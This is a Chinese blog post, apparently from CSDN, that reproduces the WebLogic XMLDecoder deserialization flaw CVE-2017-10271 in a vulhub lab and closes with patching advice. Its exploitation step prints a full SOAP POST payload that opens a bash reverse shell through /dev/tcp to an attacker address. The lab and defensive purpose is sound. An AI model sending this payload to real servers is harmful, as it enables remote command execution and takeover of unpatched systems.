【Weblogic】XMLDecoder反序列化漏洞(CVE-2017-10271)

原创 已于 2022-12-11 20:53:23 修改 · 431 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全 #网络
于 2022-12-08 18:09:05 首次发布
本文详细介绍了Weblogic的CVE-2017-10271漏洞,该漏洞由于WLS Security组件在解析XML数据时的反序列化问题,可能导致远程执行命令。文章涵盖了漏洞产生原因、环境搭建步骤、漏洞利用方法以及修复建议,包括如何判断漏洞存在和如何应用官方提供的安全补丁。

千万不要忘记:我们飞翔得越高,我们在那些不能飞翔的人眼中的形象越是渺小。 --尼采

产生原因

CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

环境搭建

我们这里使用的环境是vulhub,我是在kali上部署的vulhub.

进入CVE-2017-10271目录

cd vluhub/weblogic/CVE-2017-10271

启动靶机环境

docker-compose up -d

查看启动环境

 浏览器访问127.0.0.1:7001

说明环境部署完成

漏洞利用

受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。

1、判断:访问 http://127.0.0.1:7001/wls-wsat/CoordinatorPortType11

可能存在漏洞

2、构造POST包进行反弹shell测试

 

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1

Host: 192.168.42.128:7001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: */*;

Accept-Language: en

Accept-Encoding: gzip, deflate

Connection: close

Contenet-length:664

Content-Length: 1017



<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

    <soapenv:Header>

        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

            <java version="1.4.0" class="java.beans.XMLDecoder">

                <void class="java.lang.ProcessBuilder">

                    <array class="java.lang.String" length="3">

                        <void index="0">

                            <string>/bin/bash</string>

                        </void>

                        <void index="1">

                            <string>-c</string>

                        </void>

                        <void index="2">

                            <string>bash -i &gt;&amp; /dev/tcp/192.168.42.128/5555 0&gt;&amp;1</string>

                        </void> 

                    </array>

                    <void method="start"/>

                </void>

            </java>

        </work:WorkContext>

    </soapenv:Header>

    <soapenv:Body/>

</soapenv:Envelope>

可以看到链接成功

 

 漏洞验证成功!

修复建议

1、前往Oracle官网下载10月份所提供的安全补丁:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
2、删除wls-wsat组件,再次访问返回404.

1.删除Oracle\Middleware\wlserver_10.3\server\lib\wls-wsat.war
2.删除user_projects\domains\base_domain\servers\AdminServer\tmp.internal\wls-wsat.war
3.删除C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\wls-wsat
4.重启Weblogic

渗透测试中反弹shell的27种实战方法全解析
最新发布
互联网环境恶劣,现在积极的想从事网络安全行业
01-06 1565
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)
又菜又爱倒腾的博客
10-29 1473
#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)# 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 三、产生原因 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2319
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
XML Decoder反序列化漏洞CVE-2017-10271
热门推荐
yumengzth的博客
07-27 1万+
0x00 漏洞产生的原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 反序列化漏洞的原理与动态调试推荐链接 WebLogic XMLDeco...
Tomcat弱口令复现及利用(反弹shell)
weixin_45695535的博客
04-04 6212
整体过程欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编
xstream反序列化
weixin_48776804的博客
06-06 999
xstream反序列化
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
m0_58596609的博客
12-09 2127
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
Weblogic_XMLDecoder反序列化漏洞_CVE-2017-10271(未完待续)
simonnews的博客
05-14 412
Weblogic_XMLDecoder反序列化漏洞_CVE-2017-102711 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他6 参考 1 漏洞概述 1.1 基础知识 1.2 漏洞概述 1.3 影响版本 webLogic 10.3.6.0、12.1.3.0、12.2.1.1 、12.2.1.2版本 2 漏洞原理分析 调用栈 weblogic.wsee.jaxws.workcontext.WorkContextServerTube->p
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271
SoulCat
02-12 2758
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271漏洞概述: -漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 漏洞版本: 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 漏洞搭建...
【研究】weblogic漏洞系列XMLDecoder 反序列化漏洞CVE-2017-10271
god_Zeo的安全博客
08-15 766
【研究】weblogic漏洞系列- 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2017-10271)1.环境2.原理3.影响版本4.利用过程 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 Weblogic的WLS Securit...
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 2478
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1513
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
weblogic 反序列化 [CVE-2017-10271]
npc88888的博客
05-10 1469
根据攻击者利用POC分析发现所利用的为wls-wsat组件的CoordinatorPortType接口,若Weblogic服务器集群中未应用此组件,建议临时备份后将此组件删除,当形成防护能力后,再进行恢复。WebLogic没有对XML的数据进行任何的过滤,导致可以构造XML数据,反序列化任意对象,从而RCE,这也就是CVE-2017-3506产生的原因。参考 https://blog.csdn.net/yumengzth/article/details/97522783。的WLS Security组件。
weblogic漏洞汇总-XMLDecoder
黑白的博客
06-25 5419
受影响的版本vulhub上面只有CVE-2017-10271,我们就起CVE-2017-10271的镜像吧,因为CVE-2017-3506和CVE-2017-10271调用链都一样先有的CVE-2017-3506,不对用户输入的SOAP (XML) 数据进行验证,在其中使用object标签就可以进行远程命令执行。
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)--vulhub
ccc_9wy的博客
12-12 1558
weblogic XMLDecoder反序列化漏洞复现;CVE-2017-10271;原理解释;vulhub。
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 5429
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
weblogic反序列化XMLDecoder
遇事不决冲冲冲
05-18 2150
基于XMLweblogic反序列化漏洞 紧跟上文,这篇来分析一下基于XMLweblogic反序列化漏洞,这里xml本身就是序列化对象,通过XMLDecoder进行反序列化解析(循环遍历XML数据并进行拼接处理),最终拼接出完整的恶意语句并执行,列出CVECVE-2017-3506、CVE-2017-10271CVE-2019-2729、CVE-2019-2725,漏洞复现,断点分析,修复
Weblogic系列漏洞复现——vulhub
qq_45612828的博客
08-08 2443
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic 任意文件上传漏洞CVE-2018-2894) Weblogic Pre-Auth 远程命令执行(CVE-2020-14882、CVE-2020-14883) Weblogic ssrf(CVE-2014-4210)......
CVE-2017-10271复现
qq_56258713的博客
07-03 3324
CVE-2017-10271复现
weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 2286
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值